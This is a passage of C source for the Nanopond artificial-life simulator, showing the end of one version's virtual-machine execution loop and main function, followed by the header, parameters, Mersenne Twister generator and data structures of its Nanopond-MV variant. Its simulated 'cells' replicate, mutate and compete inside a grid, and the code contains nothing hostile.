(uint64_t)maxGeneration,
(uint64_t)statCounters.viableCellsReplaced,
(uint64_t)statCounters.viableCellsKilled,
(uint64_t)statCounters.viableCellShares
);
/* The next 16 are the average frequencies of execution for each
* instruction per cell execution. */
double totalMetabolism = 0.0;
for(x=0;x<16;++x) {
totalMetabolism += statCounters.instructionExecutions[x];
printf(",%.4f",(statCounters.cellExecutions > 0.0) ? (statCounters.instructionExecutions[x] / statCounters.cellExecutions) : 0.0);
}
/* The last column is the average metabolism per cell execution */
printf(",%.4f\n",(statCounters.cellExecutions > 0.0) ? (totalMetabolism / statCounters.cellExecutions) : 0.0);
fflush(stdout);
if ((lastTotalViableReplicators > 0)&&(totalViableReplicators == 0))
fprintf(stderr,"[EVENT] Viable replicators have gone extinct. Please reserve a moment of silence.\n");
else if ((lastTotalViableReplicators == 0)&&(totalViableReplicators > 0))
fprintf(stderr,"[EVENT] Viable replicators have appeared!\n");
lastTotalViableReplicators = totalViableReplicators;
/* Reset per-report stat counters */
for(x=0;x<sizeof(statCounters);++x)
((uint8_t *)&statCounters)[x] = (uint8_t)0;
}
/**
* Dumps the genome of a cell to a file.
*
* @param file Destination
* @param cell Source
*/
static void dumpCell(FILE *file, struct Cell *cell)
{
uintptr_t wordPtr,shiftPtr,inst,stopCount,i;
if (cell->energy&&(cell->generation > 2)) {
wordPtr = 0;
shiftPtr = 0;
stopCount = 0;
for(i=0;i<POND_DEPTH;++i) {
inst = (cell->genome[wordPtr] >> shiftPtr) & 0xf;
/* Four STOP instructions in a row is considered the end.
* The probability of this being wrong is *very* small, and
* could only occur if you had four STOPs in a row inside
* a LOOP/REP pair that's always false. In any case, this
* would always result in our *underestimating* the size of
* the genome and would never result in an overestimation. */
fprintf(file,"%x",(unsigned int)inst);
if (inst == 0xf) { /* STOP */
if (++stopCount >= 4)
break;
} else stopCount = 0;
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
}
}
}
fprintf(file,"\n");
}
static inline struct Cell *getNeighbor(const uintptr_t x,const uintptr_t y,const uintptr_t dir)
{
/* Space is toroidal; it wraps at edges */
switch(dir) {
case N_LEFT:
return (x) ? &pond[x-1][y] : &pond[POND_SIZE_X-1][y];
case N_RIGHT:
return (x < (POND_SIZE_X-1)) ? &pond[x+1][y] : &pond[0][y];
case N_UP:
return (y) ? &pond[x][y-1] : &pond[x][POND_SIZE_Y-1];
case N_DOWN:
return (y < (POND_SIZE_Y-1)) ? &pond[x][y+1] : &pond[x][0];
}
return &pond[x][y]; /* This should never be reached */
}
static inline int accessAllowed(struct Cell *const c2,const uintptr_t c1guess,int sense)
{
/* Access is more probable the more the genomes differ in sense 0, and
 * more probable the more similar they are in sense 1. Sense 0 is used
 * for "negative" interactions (KILL, offspring replacement) and sense 1
 * for "positive" ones (SHARE). Randomly seeded cells (parentID == 0)
 * are always accessible. */
if (!c2->parentID)
return 1;
const uintptr_t bitsDifferent = BITS_IN_FOURBIT_WORD[(c2->genome[0] & 0xf) ^ (c1guess & 0xf)];
return sense ? ((getRandom() & 0xf) >= bitsDifferent) : ((getRandom() & 0xf) <= bitsDifferent);
}
static inline uint8_t getColor(struct Cell *c)
{
uintptr_t i,j,word,sum,opcode,skipnext;
if (c->energy) {
switch(colorScheme) {
case KINSHIP:
/*
* Kinship color scheme by <NAME>
*
* For cells of generation > 1, saturation and value are set to maximum.
* Hue is a hash-value with the property that related genomes will have
* similar hue (but of course, as this is a hash function, totally
* different genomes can also have a similar or even the same hue).
* Therefore the difference in hue should to some extent reflect the grade
* of "kinship" of two cells.
*/
if (c->generation > 1) {
sum = 0;
skipnext = 0;
for(i=0;i<POND_DEPTH_SYSWORDS&&(c->genome[i] != ~((uintptr_t)0));++i) {
word = c->genome[i];
for(j=0;j<SYSWORD_BITS/4;++j,word >>= 4) {
/* We ignore 0xf's here, because otherwise very similar genomes
* might get quite different hash values in the case when one of
* the genomes is slightly longer and uses one more machine
* word. */
opcode = word & 0xf;
if (skipnext)
skipnext = 0;
else {
if (opcode != 0xf)
sum += opcode;
if (opcode == 0xc) /* 0xc == XCHG */
skipnext = 1; /* Skip "operand" after XCHG */
}
}
}
/* For the hash-value use a wrapped around sum of the sum of all
* commands and the length of the genome. */
return (uint8_t)((sum % 192) + 64);
}
return 0;
case LINEAGE:
/*
* Cells with generation > 1 are color-coded by lineage.
*/
return (c->generation > 1) ? (((uint8_t)c->lineage) | (uint8_t)1) : 0;
case MAX_COLOR_SCHEME:
/* ... never used... to make compiler shut up. */
break;
}
}
return 0; /* Cells with no energy are black */
}
volatile int exitNow = 0;
static void *run(void *targ)
{
const uintptr_t threadNo = (uintptr_t)targ;
uintptr_t x,y,i;
uintptr_t clock = 0;
/* Buffer used for execution output of candidate offspring */
uintptr_t outputBuf[POND_DEPTH_SYSWORDS];
/* Miscellaneous variables used in the loop */
uintptr_t currentWord,wordPtr,shiftPtr,inst,tmp;
struct Cell *pptr,*tmpptr;
/* Virtual machine memory pointer register (which
* exists in two parts... read the code below...) */
uintptr_t ptr_wordPtr;
uintptr_t ptr_shiftPtr;
/* The main "register" */
uintptr_t reg;
/* Which way is the cell facing? */
uintptr_t facing;
/* Virtual machine loop/rep stack */
uintptr_t loopStack_wordPtr[POND_DEPTH];
uintptr_t loopStack_shiftPtr[POND_DEPTH];
uintptr_t loopStackPtr;
/* If this is nonzero, we're skipping to matching REP */
/* It is incremented to track the depth of a nested set
* of LOOP/REP pairs in false state. */
uintptr_t falseLoopDepth;
#ifdef USE_SDL
SDL_Event sdlEvent;
const uintptr_t sdlPitch = screen->pitch;
#endif
/* If this is nonzero, cell execution stops. This allows us
* to avoid the ugly use of a goto to exit the loop. :) */
int stop;
/* Main loop */
while (!exitNow) {
/* Increment clock and run reports periodically */
/* Clock is incremented at the start, so it starts at 1 */
++clock;
if ((threadNo == 0)&&(!(clock % REPORT_FREQUENCY))) {
doReport(clock);
/* SDL display is also refreshed every REPORT_FREQUENCY */
#ifdef USE_SDL
while (SDL_PollEvent(&sdlEvent)) {
if (sdlEvent.type == SDL_QUIT) {
fprintf(stderr,"[QUIT] Quit signal received!\n");
exitNow = 1;
} else if (sdlEvent.type == SDL_MOUSEBUTTONDOWN) {
switch (sdlEvent.button.button) {
case SDL_BUTTON_LEFT:
fprintf(stderr,"[INTERFACE] Genome of cell at (%d, %d):\n",sdlEvent.button.x, sdlEvent.button.y);
dumpCell(stderr, &pond[sdlEvent.button.x][sdlEvent.button.y]);
break;
case SDL_BUTTON_RIGHT:
colorScheme = (colorScheme + 1) % MAX_COLOR_SCHEME;
fprintf(stderr,"[INTERFACE] Switching to color scheme \"%s\".\n",colorSchemeName[colorScheme]);
for (y=0;y<POND_SIZE_Y;++y) {
for (x=0;x<POND_SIZE_X;++x)
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(&pond[x][y]);
}
break;
}
}
}
SDL_BlitSurface(screen, NULL, winsurf, NULL);
SDL_UpdateWindowSurface(window);
#endif /* USE_SDL */
}
/* Introduce a random cell somewhere with a given energy level */
/* This is called seeding, and introduces both energy and
* entropy into the substrate. This happens every INFLOW_FREQUENCY
* clock ticks. */
if (!(clock % INFLOW_FREQUENCY)) {
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
#ifdef USE_PTHREADS_COUNT
pthread_mutex_lock(&(pptr->lock));
#endif
pptr->ID = cellIdCounter;
pptr->parentID = 0;
pptr->lineage = cellIdCounter;
pptr->generation = 0;
#ifdef INFLOW_RATE_VARIATION
pptr->energy += INFLOW_RATE_BASE + (getRandom() % INFLOW_RATE_VARIATION);
#else
pptr->energy += INFLOW_RATE_BASE;
#endif /* INFLOW_RATE_VARIATION */
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
pptr->genome[i] = getRandom();
++cellIdCounter;
/* Update the random cell on SDL screen if viz is enabled */
#ifdef USE_SDL
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
#endif /* USE_SDL */
#ifdef USE_PTHREADS_COUNT
pthread_mutex_unlock(&(pptr->lock));
#endif
}
/* Pick a random cell to execute */
i = getRandom();
x = i % POND_SIZE_X;
y = ((i / POND_SIZE_X) >> 1) % POND_SIZE_Y;
pptr = &pond[x][y];
/* Reset the state of the VM prior to execution */
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
outputBuf[i] = ~((uintptr_t)0); /* ~0 == 0xfffff... */
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
reg = 0;
loopStackPtr = 0;
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
facing = 0;
falseLoopDepth = 0;
stop = 0;
/* We use a currentWord buffer to hold the word we're
* currently working on. This speeds things up a bit
* since it eliminates a pointer dereference in the
* inner loop. We have to be careful to refresh this
* whenever it might have changed... take a look at
* the code. :) */
currentWord = pptr->genome[0];
/* Keep track of how many cells have been executed */
statCounters.cellExecutions += 1.0;
/* Core execution loop */
while ((pptr->energy)&&(!stop)) {
/* Get the next instruction */
inst = (currentWord >> shiftPtr) & 0xf;
/* Randomly frob either the instruction or the register with a
* probability defined by MUTATION_RATE. This introduces variation,
* and since the variation is introduced into the state of the VM
* it can have all manner of different effects on the end result of
* replication: insertions, deletions, duplications of entire
* ranges of the genome, etc. */
if ((getRandom() & 0xffffffff) < MUTATION_RATE) {
tmp = getRandom(); /* Call getRandom() only once for speed */
if (tmp & 0x80) /* Check for the 8th bit to get random boolean */
inst = tmp & 0xf; /* Only the first four bits are used here */
else reg = tmp & 0xf;
}
/* Each instruction processed costs one unit of energy */
--pptr->energy;
/* Execute the instruction */
if (falseLoopDepth) {
/* Skip forward to matching REP if we're in a false loop. */
if (inst == 0x9) /* Increment false LOOP depth */
++falseLoopDepth;
else if (inst == 0xa) /* Decrement on REP */
--falseLoopDepth;
} else {
/* If we're not in a false LOOP/REP, execute normally */
/* Keep track of execution frequencies for each instruction */
statCounters.instructionExecutions[inst] += 1.0;
switch(inst) {
case 0x0: /* ZERO: Zero VM state registers */
reg = 0;
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
facing = 0;
break;
case 0x1: /* FWD: Increment the pointer (wrap at end) */
if ((ptr_shiftPtr += 4) >= SYSWORD_BITS) {
if (++ptr_wordPtr >= POND_DEPTH_SYSWORDS)
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
}
break;
case 0x2: /* BACK: Decrement the pointer (wrap at beginning) */
if (ptr_shiftPtr)
ptr_shiftPtr -= 4;
else {
if (ptr_wordPtr)
--ptr_wordPtr;
else ptr_wordPtr = POND_DEPTH_SYSWORDS - 1;
ptr_shiftPtr = SYSWORD_BITS - 4;
}
break;
case 0x3: /* INC: Increment the register */
reg = (reg + 1) & 0xf;
break;
case 0x4: /* DEC: Decrement the register */
reg = (reg - 1) & 0xf;
break;
case 0x5: /* READG: Read into the register from genome */
reg = (pptr->genome[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x6: /* WRITEG: Write out from the register to genome */
pptr->genome[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
pptr->genome[ptr_wordPtr] |= reg << ptr_shiftPtr;
currentWord = pptr->genome[wordPtr]; /* Must refresh in case this changed! */
break;
case 0x7: /* READB: Read into the register from buffer */
reg = (outputBuf[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x8: /* WRITEB: Write out from the register to buffer */
outputBuf[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
outputBuf[ptr_wordPtr] |= reg << ptr_shiftPtr;
break;
case 0x9: /* LOOP: Jump forward to matching REP if register is zero */
if (reg) {
if (loopStackPtr >= POND_DEPTH)
stop = 1; /* Stack overflow ends execution */
else {
loopStack_wordPtr[loopStackPtr] = wordPtr;
loopStack_shiftPtr[loopStackPtr] = shiftPtr;
++loopStackPtr;
}
} else falseLoopDepth = 1;
break;
case 0xa: /* REP: Jump back to matching LOOP if register is nonzero */
if (loopStackPtr) {
--loopStackPtr;
if (reg) {
wordPtr = loopStack_wordPtr[loopStackPtr];
shiftPtr = loopStack_shiftPtr[loopStackPtr];
currentWord = pptr->genome[wordPtr];
/* This ensures that the LOOP is rerun */
continue;
}
}
break;
case 0xb: /* TURN: Turn in the direction specified by register */
facing = reg & 3;
break;
case 0xc: /* XCHG: Skip next instruction and exchange value of register with it */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
}
tmp = reg;
reg = (pptr->genome[wordPtr] >> shiftPtr) & 0xf;
pptr->genome[wordPtr] &= ~(((uintptr_t)0xf) << shiftPtr);
pptr->genome[wordPtr] |= tmp << shiftPtr;
currentWord = pptr->genome[wordPtr];
break;
case 0xd: /* KILL: Blow away neighboring cell if allowed with penalty on failure */
tmpptr = getNeighbor(x,y,facing);
if (accessAllowed(tmpptr,reg,0)) {
if (tmpptr->generation > 2)
++statCounters.viableCellsKilled;
/* Filling first two words with 0xfffff... is enough */
tmpptr->genome[0] = ~((uintptr_t)0);
tmpptr->genome[1] = ~((uintptr_t)0);
tmpptr->ID = cellIdCounter;
tmpptr->parentID = 0;
tmpptr->lineage = cellIdCounter;
tmpptr->generation = 0;
++cellIdCounter;
} else if (tmpptr->generation > 2) {
tmp = pptr->energy / FAILED_KILL_PENALTY;
if (pptr->energy > tmp)
pptr->energy -= tmp;
else pptr->energy = 0;
}
break;
case 0xe: /* SHARE: Equalize energy between self and neighbor if allowed */
tmpptr = getNeighbor(x,y,facing);
if (accessAllowed(tmpptr,reg,1)) {
#ifdef USE_PTHREADS_COUNT
pthread_mutex_lock(&(tmpptr->lock));
#endif
if (tmpptr->generation > 2)
++statCounters.viableCellShares;
tmp = pptr->energy + tmpptr->energy;
tmpptr->energy = tmp / 2;
pptr->energy = tmp - tmpptr->energy;
#ifdef USE_PTHREADS_COUNT
pthread_mutex_unlock(&(tmpptr->lock));
#endif
}
break;
case 0xf: /* STOP: End execution */
stop = 1;
break;
}
}
/* Advance the shift and word pointers, and loop around
* to the beginning at the end of the genome. */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
currentWord = pptr->genome[wordPtr];
}
}
/* Copy outputBuf into neighbor if access is permitted and there
* is energy there to make something happen. There is no need
* to copy to a cell with no energy, since anything copied there
* would never be executed and then would be replaced with random
* junk eventually. See the seeding code in the main loop above. */
if ((outputBuf[0] & 0xff) != 0xff) {
tmpptr = getNeighbor(x,y,facing);
#ifdef USE_PTHREADS_COUNT
pthread_mutex_lock(&(tmpptr->lock));
#endif
if ((tmpptr->energy)&&accessAllowed(tmpptr,reg,0)) {
/* Log it if we're replacing a viable cell */
if (tmpptr->generation > 2)
++statCounters.viableCellsReplaced;
tmpptr->ID = ++cellIdCounter;
tmpptr->parentID = pptr->ID;
tmpptr->lineage = pptr->lineage; /* Lineage is copied in offspring */
tmpptr->generation = pptr->generation + 1;
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
tmpptr->genome[i] = outputBuf[i];
}
#ifdef USE_PTHREADS_COUNT
pthread_mutex_unlock(&(tmpptr->lock));
#endif
}
/* Update the neighborhood on SDL screen to show any changes. */
#ifdef USE_SDL
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
if (x) {
((uint8_t *)screen->pixels)[(x-1) + (y * sdlPitch)] = getColor(&pond[x-1][y]);
if (x < (POND_SIZE_X-1))
((uint8_t *)screen->pixels)[(x+1) + (y * sdlPitch)] = getColor(&pond[x+1][y]);
else ((uint8_t *)screen->pixels)[y * sdlPitch] = getColor(&pond[0][y]);
} else {
((uint8_t *)screen->pixels)[(POND_SIZE_X-1) + (y * sdlPitch)] = getColor(&pond[POND_SIZE_X-1][y]);
((uint8_t *)screen->pixels)[1 + (y * sdlPitch)] = getColor(&pond[1][y]);
}
if (y) {
((uint8_t *)screen->pixels)[x + ((y-1) * sdlPitch)] = getColor(&pond[x][y-1]);
if (y < (POND_SIZE_Y-1))
((uint8_t *)screen->pixels)[x + ((y+1) * sdlPitch)] = getColor(&pond[x][y+1]);
else ((uint8_t *)screen->pixels)[x] = getColor(&pond[x][0]);
} else {
((uint8_t *)screen->pixels)[x + ((POND_SIZE_Y-1) * sdlPitch)] = getColor(&pond[x][POND_SIZE_Y-1]);
((uint8_t *)screen->pixels)[x + sdlPitch] = getColor(&pond[x][1]);
}
#endif /* USE_SDL */
}
return (void *)0;
}
/**
* Main method
*
* @param argc Number of args
* @param argv Argument array
*/
int main(int argc,char **argv)
{
uintptr_t i,x,y;
/* Seed and init the random number generator */
prngState[0] = (uint64_t)time(NULL);
srand(time(NULL));
prngState[1] = (uint64_t)rand();
/* Reset per-report stat counters */
for(x=0;x<sizeof(statCounters);++x)
((uint8_t *)&statCounters)[x] = (uint8_t)0;
/* Set up SDL if we're using it */
#ifdef USE_SDL
if (SDL_Init(SDL_INIT_VIDEO) < 0 ) {
fprintf(stderr,"*** Unable to init SDL: %s ***\n",SDL_GetError());
exit(1);
}
atexit(SDL_Quit);
window = SDL_CreateWindow("nanopond", SDL_WINDOWPOS_CENTERED, SDL_WINDOWPOS_CENTERED, POND_SIZE_X, POND_SIZE_Y, 0);
if (!window) {
fprintf(stderr, "*** Unable to create SDL window: %s ***\n", SDL_GetError());
exit(1);
}
winsurf = SDL_GetWindowSurface(window);
if (!winsurf) {
fprintf(stderr, "*** Unable to get SDL window surface: %s ***\n", SDL_GetError());
exit(1);
}
screen = SDL_CreateRGBSurface(0, POND_SIZE_X, POND_SIZE_Y, 8, 0, 0, 0, 0);
if (!screen) {
fprintf(stderr, "*** Unable to create SDL window surface: %s ***\n", SDL_GetError());
exit(1);
}
/* Set palette entries to match the default SDL 1.2.15 palette */
{
Uint8 r[8] = {0, 36, 73, 109, 146, 182, 219, 255};
Uint8 g[8] = {0, 36, 73, 109, 146, 182, 219, 255};
Uint8 b[4] = {0, 85, 170, 255};
int curColor = 0;
for(unsigned int i = 0; i < 8; ++i) {
for(unsigned int j = 0; j < 8; ++j) {
for(unsigned int k = 0; k < 4; ++k) {
SDL_Color color = {r[i], g[j], b[k], 255};
SDL_SetPaletteColors(screen->format->palette, &color, curColor, 1);
curColor++;
}
}
}
}
#endif /* USE_SDL */
/* Clear the pond and initialize all genomes
* to 0xffff... */
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
pond[x][y].ID = 0;
pond[x][y].parentID = 0;
pond[x][y].lineage = 0;
pond[x][y].generation = 0;
pond[x][y].energy = 0;
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
pond[x][y].genome[i] = ~((uintptr_t)0);
#ifdef USE_PTHREADS_COUNT
pthread_mutex_init(&(pond[x][y].lock),0);
#endif
}
}
#ifdef USE_PTHREADS_COUNT
pthread_t threads[USE_PTHREADS_COUNT];
for(i=1;i<USE_PTHREADS_COUNT;++i)
pthread_create(&threads[i],0,run,(void *)i);
run((void *)0);
for(i=1;i<USE_PTHREADS_COUNT;++i)
pthread_join(threads[i],(void **)0);
#else
run((void *)0);
#endif
#ifdef USE_SDL
SDL_FreeSurface(screen);
SDL_DestroyWindow(window);
#endif /* USE_SDL */
return 0;
}
/* *********************************************************************** */
/* */
/* Nanopond-MV version 1.0 -- Multivalent nanopond */
/* Copyright (C) 2005 <NAME> - http://www.greythumb.com/people/api */
/* */
/* This program is free software; you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License, or */
/* (at your option) any later version. */
/* */
/* This program is distributed in the hope that it will be useful, */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */
/* GNU General Public License for more details. */
/* */
/* You should have received a copy of the GNU General Public License */
/* along with this program; if not, write to the Free Software */
/* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110 USA */
/* */
/* *********************************************************************** */
/* ----------------------------------------------------------------------- */
/* Tunable parameters */
/* ----------------------------------------------------------------------- */
/* Iteration to stop at. Comment this out to run forever. */
/* #define STOP_AT 150000000000ULL */
/* Frequency of comprehensive reports-- lower values will provide more
* info while slowing down the simulation. Higher values will give less
* frequent updates. */
/* This is also the frequency of screen refreshes if SDL is enabled. */
#define REPORT_FREQUENCY 100000
/* Uncomment this to save a BMP image of the screen every
* REPORT_FREQUENCY ticks. Requires that SDL (see below) be enabled. */
#define SAVE_BMPS 1
/* Frequency at which to dump all viable replicators (generation > 2)
* to a file named <clock>.dump.csv in the current directory. Comment
* out to disable. The cells are dumped in hexadecimal, which is
* semi-human-readable if you look at the big switch() statement
* in the main loop to see what instruction is signified by each
* four-bit value. */
#define DUMP_FREQUENCY 100000000
/* Mutation rate -- range is from 0 (none) to 0xffffffff (all mutations!) */
/* To get it from a float probability from 0.0 to 1.0, multiply it by
* 4294967295 (0xffffffff) and round. */
#define MUTATION_RATE 21475
/* How frequently should random cells be introduced? */
#define INFLOW_FREQUENCY 100
/* Size of pond in X and Y dimensions. */
#define POND_SIZE_X 640
#define POND_SIZE_Y 480
/* Depth of pond in four-bit codons -- this is the maximum
* genome size. This *must* be a multiple of 16! */
#define POND_DEPTH 512
/* Base and variation for energy of each valence in pond */
#define POND_ENERGY_BASE 50000
/* #define POND_ENERGY_VARIATION 10000 */
/* Define this to use SDL. To use SDL, you must have SDL headers
* available and you must link with the SDL library when you compile. */
/* Comment this out to compile without SDL visualization support. */
#define USE_SDL 1
/* Default color scheme */
#define DEFAULT_COLOR_SCHEME VALENCE
/* ----------------------------------------------------------------------- */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef USE_SDL
#ifdef _MSC_VER
#include <SDL.h>
#else
#include <SDL/SDL.h>
#endif /* _MSC_VER */
#endif /* USE_SDL */
/* ----------------------------------------------------------------------- */
/* This is the Mersenne Twister by <NAME> and <NAME> */
/* http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/MT2002/emt19937ar.html */
/* ----------------------------------------------------------------------- */
/* A few very minor changes were made by me - Adam */
/*
A C-program for MT19937, with initialization improved 2002/1/26.
Coded by <NAME> and <NAME>.
Before using, initialize the state by using init_genrand(seed)
or init_by_array(init_key, key_length).
Copyright (C) 1997 - 2002, <NAME> and <NAME>,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The names of its contributors may not be used to endorse or promote
products derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Any feedback is very welcome.
http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/emt.html
email: <EMAIL> (remove space)
*/
/* Period parameters */
#define N 624
#define M 397
#define MATRIX_A 0x9908b0dfUL /* constant vector a */
#define UPPER_MASK 0x80000000UL /* most significant w-r bits */
#define LOWER_MASK 0x7fffffffUL /* least significant r bits */
static unsigned long mt[N]; /* the array for the state vector */
static int mti=N+1; /* mti==N+1 means mt[N] is not initialized */
/* initializes mt[N] with a seed */
static void init_genrand(unsigned long s)
{
mt[0]= s & 0xffffffffUL;
for (mti=1; mti<N; mti++) {
mt[mti] =
(1812433253UL * (mt[mti-1] ^ (mt[mti-1] >> 30)) + mti);
/* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
/* In the previous versions, MSBs of the seed affect */
/* only MSBs of the array mt[]. */
/* 2002/01/09 modified by <NAME> */
mt[mti] &= 0xffffffffUL;
/* for >32 bit machines */
}
}
/* generates a random number on [0,0xffffffff]-interval */
static inline uint32_t genrand_int32()
{
uint32_t y;
static uint32_t mag01[2]={0x0UL, MATRIX_A};
/* mag01[x] = x * MATRIX_A for x=0,1 */
if (mti >= N) { /* generate N words at one time */
int kk;
for (kk=0;kk<N-M;kk++) {
y = (mt[kk]&UPPER_MASK)|(mt[kk+1]&LOWER_MASK);
mt[kk] = mt[kk+M] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
for (;kk<N-1;kk++) {
y = (mt[kk]&UPPER_MASK)|(mt[kk+1]&LOWER_MASK);
mt[kk] = mt[kk+(M-N)] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
y = (mt[N-1]&UPPER_MASK)|(mt[0]&LOWER_MASK);
mt[N-1] = mt[M-1] ^ (y >> 1) ^ mag01[y & 0x1UL];
mti = 0;
}
y = mt[mti++];
/* Tempering */
y ^= (y >> 11);
y ^= (y << 7) & 0x9d2c5680UL;
y ^= (y << 15) & 0xefc60000UL;
y ^= (y >> 18);
return y;
}
/* ----------------------------------------------------------------------- */
/* Size of genome instructions in bits */
#define INSTRUCTION_WORD_SIZE 4
/* Bit mask for instruction words */
#define INSTRUCTION_MASK 0xf
/* Instructions per machine size word */
#define INSTRUCTIONS_PER_UINTPTR ((sizeof(uintptr_t) * 8) / INSTRUCTION_WORD_SIZE)
/* Execution start position in instruction words */
#define EXEC_START_POSITION 2
/* Constants representing neighbors in the 2D grid. */
#define N_LEFT 0
#define N_RIGHT 1
#define N_UP 2
#define N_DOWN 3
#ifdef USE_SDL
/* 16 primary colors plus one extra (brown), initialized in main() */
static uint8_t w3cPrimaryColors[17];
#endif /* USE_SDL */
/**
* Structure for a cell in the pond
*/
struct Cell
{
/* Globally unique cell ID */
uint64_t ID;
/* Generations start at 0 and are incremented from there. */
/* Generations > 2 are considered "viable replicators." */
uintptr_t generation;
/* Energy level of this cell for each type of energy */
uintptr_t energy[16];
/* Memory space for cell genome */
uintptr_t genome[POND_DEPTH / INSTRUCTIONS_PER_UINTPTR];
};
/* The pond is a 2D array of cells */
struct Cell pond[POND_SIZE_X][POND_SIZE_Y];
/* Currently selected color scheme */
enum { CHECKSUM,LOGO,VALENCE,MAX_COLOR_SCHEME } colorScheme = DEFAULT_COLOR_SCHEME;
const char *colorSchemeName[MAX_COLOR_SCHEME] = { "CHECKSUM", "LOGO", "VALENCE" };
/* Macro for getting byte x from genome */
#define genomeAt(g,x) ((g[(x) / INSTRUCTIONS_PER_UINTPTR] >> (((x) % INSTRUCTIONS_PER_UINTPTR) * INSTRUCTION_WORD_SIZE)) & INSTRUCTION_MASK)
/* Function for setting the value of byte x in the genome */
static inline void genomeSet(uintptr_t *g,uintptr_t x,uintptr_t v)
{
const uintptr_t idx = x / INSTRUCTIONS_PER_UINTPTR;
const uintptr_t shift = (x % INSTRUCTIONS_PER_UINTPTR) * INSTRUCTION_WORD_SIZE;
g[idx] &= ~(((uintptr_t)INSTRUCTION_MASK) << shift);
g[idx] |= (v & INSTRUCTION_MASK) << shift;
}
/* Macro for determining whether a cell with a given generation is a
* probable viable replicator. Defining this as a macro makes code
* easier to read. */
#define isViableReplicator(g) ((g) > 2)
/**
* Get a random number
*
* @return Random number
*/
static inline uintptr_t getRandom()
{
/* A good optimizing compiler should optimize this 'if' out */
/* This is to make it work on 64-bit boxes */
if (sizeof(uintptr_t) == 8)
return (uintptr_t)((((uint64_t)genrand_int32()) << 32) ^ ((uint64_t)genrand_int32()));
else return (uintptr_t)genrand_int32();
}
/* Get the valence of a genome */
#define valence(g) (genomeAt(g,1))
/* Get the logo of an 8-bit codon */
#define logo(g) (genomeAt(g,2))
/* Macro to calculate the corresponding valence to a valence value */
#define correspondingValence(v) ((v) ^ 0xf)
/**
* Structure for keeping some running tally type statistics
*/
struct PerReportStatCounters
{
/* Counts for the number of times each instruction was
* executed since the last report. */
double instructionExecutions[16];
/* Number of cells executed since last report */
double cellExecutions;
/* Number of successful SHARE operations */
uint64_t viableCellShares;
};
/* Global statistics counters */
struct PerReportStatCounters statCounters;
/**
* Output a line of comma-separated statistics data
*
* @param clock Current clock
*/
static void doReport(const uint64_t clock)
{
static uint64_t lastTotalViableReplicators = 0;
uintptr_t x,y;
uint64_t totalViableReplicators = 0ULL;
uint64_t maxGeneration = 0ULL;
uint64_t g = 0ULL;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
g = (uint64_t)pond[x][y].generation;
if (isViableReplicator(g))
++totalViableReplicators;
if (g > maxGeneration)
maxGeneration = g;
}
}
/* Look here to get the columns in the CSV output */
/* The first four are here and are self-explanatory */
printf("%llu,%llu,%llu,%llu",
clock,
totalViableReplicators,
